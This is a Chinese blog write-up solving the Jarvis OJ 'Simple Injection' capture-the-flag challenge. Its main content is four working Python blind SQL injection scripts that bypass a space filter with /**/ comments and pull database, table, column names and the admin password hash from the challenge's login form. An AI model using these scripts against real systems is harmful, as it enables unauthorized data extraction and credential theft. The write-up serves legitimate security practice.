Jarvis OJ Simple Injection

最新推荐文章于 2019-11-05 14:20:12 发布
最新推荐文章于 2019-11-05 14:20:12 发布
阅读量538 收藏
点赞数 3
分类专栏: Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/90082789
版权

Jarvis OJ Simple Injection

题目提示说是sql注入,一打开就是登陆界面,发现输入admin显示的是密码错误,胡乱输入其他的是用户名错误,让后 1‘ or ‘1可以,但是1’ or 1#却不行,1‘/**/or/**/1#也可以。所以应该是过滤了空格,其他的都没过滤。

让后就想到了实验吧的一道题,
附上题目连接:http://ctf5.shiyanbar.com/web/pcat/index.php 和我写的题解
“因缺思汀的绕过”
试了一下,发现不行。于是开始盲注。
附上脚本:
爆数据库

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr(database(),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if(mid==1):
        break
    result+=chr(mid)
    print(result)
print("database:",result)
#database: injection

爆表名

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if (mid == 1):
        break
    result+=chr(mid)
    print(result,mid)
print("table_name:",result)
#table_name: admin

字段名

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if (mid == 1):
        break
    result+=chr(mid)
    print(result)
print("column_name:",result)
#column_name: id,username,password

password

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if (mid == 1):
        break
    result+=chr(mid)
    print(result)
print("password:",result)
#password: 334cfb59c9d74849801d5acdcfdaadc3
沐目_01
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Jarvisoj_Simple Injection
一只迂腐子
03-04 1476
Simple Injection - 167 SOLVERS - 350 WEB 很简单的注入,大家试试? 题目入口:http://web.jarvisoj.com:32787/ 题目来源:ISCC2016 访问页面之后,得到就是一个登陆页面。通过burp进行抓包,发现在响应头或者是页面中含有提示信息,那么就说明这的确是一个普通的登陆型的SQL注入漏洞了。 常见的登陆漏洞类型 ...
jarvisoj WEB +MISC writeup
Ni9htMar3的博客
12-26 7257
WEB PORT 51 Login LOCALHOST 神盾局的秘密 IN a mess Easy Gallery Simple Injection 方法一 方法二 api的调用 PHPINFO
Jarvis-OJ-- Simple Injection解法
qq_42812036的博客
11-05 499
PORT51(curl) LOCALHOST(伪造ip) Login(SQL注入) 神盾局的秘密(base64编码+反序列化) IN A Mess(代码审计+过滤空格SQL注入) admin(robots.txt+cookie欺骗) [61dctf]babyphp(Git泄露+代码注入) Easy Gallery(文件上传、%00截断) Simple Injection(过滤空格SQL注入) RE...
jarvis oj Web By Assassin
Assassin
08-22 8630
LOCALHOST套路题,构造headers中加上x-forwarded-for=127.0.0.1即可 PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}PORT51访问了页面发现让你Please use port 51 to visit this site.明显是绑定的端口,不可能用51端口去访问啊,很困惑结果是自己去访问的时候需要用到51端口啊…原来如此,使用curl中的–l
Jarvis OJ web writeup
stepone4ward的博客
04-03 794
1.Login 在响应头中得到了hint 也就是说我们post传入的pass经过了md5加密,我们都知道这种登陆问题最常见的payload就是类似于admin'or 1=1#这种,同理我们只要能找到一个md5加密后符合这种类似格式的语句即可,在实验吧当中也有一道相似的题目,最后的payload为ffifdyop,这个字符串经过md5加密后的结果为 符合上文提到的格式要求,提交后得到flag。 ...
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
Jarvis声音.zip
09-28
"Jarvis声音.zip"这个压缩包文件显然与流行的科幻角色——钢铁侠托尼·斯塔克的人工智能助手Jarvis有关。Jarvis,全名Just A Rather Very Intelligent System,是漫威宇宙中的一个标志性元素,其在电影中以其独特、...
jarvis音频.zip
07-31
"JARVIS_֪ͨ_1.m4r"可能是贾维斯的语音信息提示,"JARVIS_日历提醒_1.m4r"则能在日程提醒时带来钢铁侠团队的智能感,而"JARVIS_新信息_2.m4r"和"JARVIS_新语音信箱_1.m4r"则是针对新消息和语音留言的特别提示,让你...
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
Jarvis OJ /inject
沐目的博客
10-15 272
Jarvis OJ /inject 感觉SQL注入挺重要的,也算是比较基础的东西,而且经常写题会遇到。所以就打算每次遇到一些新的东西,或者忘了的东西,就记录一下。也会记录一些数据库的知识,毕竟SQL注入和数据库是分不开的。 一.MySQL数据排序asc、desc 1.asc 这个就是把查询到的数据,从小到大的排列,当然,这也是默认的排解方式。像这个是没有加任何其他东西的查找。 mysql&gt...
JarvisOJ web题目 [61dctf]inject 解题思路----mysql反引号与单引号的区别
__Curtain_
04-12 2396
原题:http://web.jarvisoj.com:32794/    给了一条提示先找到源码,几种常见的源码泄露方式都试一边。最后在提交 http://web.jarvisoj.com:32794/index.php~ 发现源码。 &lt;?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $ta...
jarvis oj(web wp)
Xi4or0uji
08-19 6873
api调用 这题是slim架构的xxe漏洞,看博客做题2333 https://www.leavesongs.com/PENETRATION/slim3-xxe.html simple injection username和password是注入点,然后就是确认怎么注入了 题目是过滤了空格的,但是可以用/**/绕过 确认存在admin表 username=admin'/**/...
Jarvis OJ web WriteUp
heySister
02-08 3689
我要开始做Jarvis OJ上的题目啦!!!之前bugku上还剩下的几道题,之后也会再补上的,做出来之后,就会把思路写到博客里的。新手,有错的地方多多指教。(不是按顺序写的…我就先挑简单的做啦~~~) PORT 51 这个题目用到了curl命令,是利用URL语法在命令行方式下工作的开源为念传输工具….之前没接触过这个命令…我在我的ubuntu虚拟机下运行curl --help ,可以看到如下...
jarvisoj Inject & PHPINFO
river
03-26 499
Jarvisoj Inject 扫描后台得到index.php~ <?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $table = Filter($table); mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker(); $sq...
Jarvis OJ writeup Web
quedgee
10-27 840
参考了http://www.joychou.org/web/SQL-injection-with-raw-MD5-hashes.html抓包,发现了hint sql="SELECT∗FROMadminWHEREpass=′".md5(sql = "SELECT * FROM admin WHERE pass = '".md5(password,true).”’”;思路比较明确,当md5后的hex转
Jarvis OJ inject(反引号注入)
wywwzjj
02-22 825
http://web.jarvisoj.com:32794/index.php~ 得到源码 &amp;amp;amp;amp;amp;lt;?php require(&amp;amp;amp;amp;quot;config.php&amp;amp;amp;amp;quot;); $table = $_GET['table']?$_GET['table']:&amp;amp;amp;amp;quot;test&amp;amp;amp;amp;quot;;
Jarvis OJ PHPINFO【审计代码反序列化】
Sp4rkW的博客
11-02 3932
原题地址:http://web.jarvisoj.com:32784/ 其实这题一开始是没有任何思路的,感觉不存在任何数据传输接收点,后来看到了一篇wp,点这里 感觉瞬间打开了新世界,,,这里写篇write up记录下做题过程 首先打开题目页面直接获得源码: &lt;?php //A webshell is wait for you ini_set('session.s...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值